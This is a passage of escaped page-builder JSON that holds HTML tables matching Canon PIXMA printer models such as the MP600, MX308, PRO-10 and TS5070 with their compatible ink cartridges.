(Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo 